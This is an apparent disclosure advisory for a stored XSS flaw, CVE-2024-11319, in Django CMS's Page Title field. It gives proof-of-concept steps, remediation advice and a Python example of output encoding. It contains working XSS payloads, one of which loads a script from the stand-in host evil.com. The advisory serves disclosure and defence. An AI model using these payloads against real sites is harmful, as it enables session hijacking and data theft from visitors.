Security Update: Issue Fixed
The fix for this vulnerability has been committed here:
https://github.com/django-cms/
Vendor Advisory:
https://www.django-cms.org/en/blog/2024/11/13/django-cms-security-update/
Django CMS version 4.1.3 is affected by a stored Cross-Site Scripting (XSS) vulnerability. It allows attackers to inject arbitrary JavaScript that executes in the context of the web application, potentially compromising every user who visits the affected page.
CVE-ID: CVE-2024-11319
CVSS Score:
CVSS v4.0 Base Score: 9.3 - Critical
- CVSS:4.0/AV:A/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
Affected Versions:
- Django CMS versions 3.11.7, 3.11.8, 4.1.2, and 4.1.3.
Vulnerability Summary:
A stored XSS vulnerability was identified in Django CMS 4.1.3. It occurs in the Page Title field of the Page Creation interface under the /admin/cms/pagecontent/ endpoint. An attacker can inject JavaScript into the title; the title is later rendered into the page, so the injected code executes when a user visits the affected page.
Technical Details:
- Location of the Vulnerability: /admin/cms/pagecontent/ endpoint.
- Vulnerable Field: Page Title field.
- Template Code Reference:
<meta property="og:title" content="{% page_attribute "page_title" %}"/>
- Source File Reference: Found in djangocms_frontend.html.
- Payload Example 1 (Simple):
"><img src=x onerror=alert('iltosec') any
- Payload Example 2 (External Script Inclusion):
"><script src="http://evil.com/xss.js"> iltosec
When an admin user creates or edits a page, if malicious content is entered in the Page Title field, it is stored in the database and then rendered on the public-facing page without proper sanitization or output encoding. This allows the attacker to execute arbitrary JavaScript code in the context of any user visiting the page.
Proof of Concept:
- Log in as an admin-level user.
- Navigate to /admin/cms/pagecontent/ to create a new page.
- In the Page Title field, input the following payload:
"><img src=x onerror=alert('iltosec') any
- Save the page.
- When visiting the public page, the JavaScript code executes, displaying an alert with the message 'iltosec'.
Alternatively, an attacker could use a payload like:
"><script src="http://evil.com/xss.js"> iltosec
This would load and execute a malicious script hosted on an external server, compromising the visitor's session or exfiltrating data.
Remediation:
- Input Sanitization: Ensure that all user input is sanitized before being stored in the database. Special characters like <, >, ", and ' should be neutralized.
- Output Encoding: Apply proper output encoding for user-supplied content when rendering it on the page. This will prevent injected JavaScript from being executed.
- CSP (Content Security Policy): Implement a robust CSP to mitigate the risk of external script inclusion and restrict script execution to trusted sources.
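As an added example (not code from django CMS or from this advisory's author), the og:title template line above in its vulnerable and output-encoded forms, with a parser-based check that flags attribute breakout. It uses only the Python standard library; html.escape emits the same entities as Django's escape() for these five characters. The sample titles are the advisory's two payloads plus a constructed benign one.

```python
import html
from html.parser import HTMLParser

# Constructed sample titles: a benign one plus the two payloads quoted in this advisory.
BENIGN_TITLE = "About us"
PAYLOAD_IMG = "\"><img src=x onerror=alert('iltosec') any"
PAYLOAD_SCRIPT = "\"><script src=\"http://evil.com/xss.js\"> iltosec"

TEMPLATE = '<meta property="og:title" content="%s"/>'


def render_og_title_unsafe(title: str) -> str:
    """Vulnerable pattern: the title is interpolated raw into the attribute,
    so a leading " closes content="..." and "><" opens a new element."""
    return TEMPLATE % title


def render_og_title_safe(title: str) -> str:
    """Hardened pattern: HTML-escape with quote=True so & < > " and ' become
    entities and the title can neither end the attribute nor start a tag."""
    return TEMPLATE % html.escape(title, quote=True)


class _TagCollector(HTMLParser):
    """Records every start tag the tolerant stdlib parser sees."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: list[str] = []

    def handle_starttag(self, tag: str, attrs) -> None:
        self.tags.append(tag)


def tags_in(fragment: str) -> list[str]:
    """Element names found in a rendered fragment. A correctly encoded
    og:title yields exactly ['meta']; an extra img/script element means
    the title broke out of the attribute value."""
    collector = _TagCollector()
    collector.feed(fragment)
    collector.close()
    return collector.tags


def title_breaks_out(title: str, renderer) -> bool:
    """True when rendering this title creates elements beyond the one <meta>."""
    return tags_in(renderer(title)) != ["meta"]
```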
Timeline:
Date        | Status
09-NOV-2024 | Reported to vendor
12-NOV-2024 | Vendor acknowledgement
12-NOV-2024 | Vulnerability fixed
13-NOV-2024 | Patch available
18-NOV-2024 | Public disclosure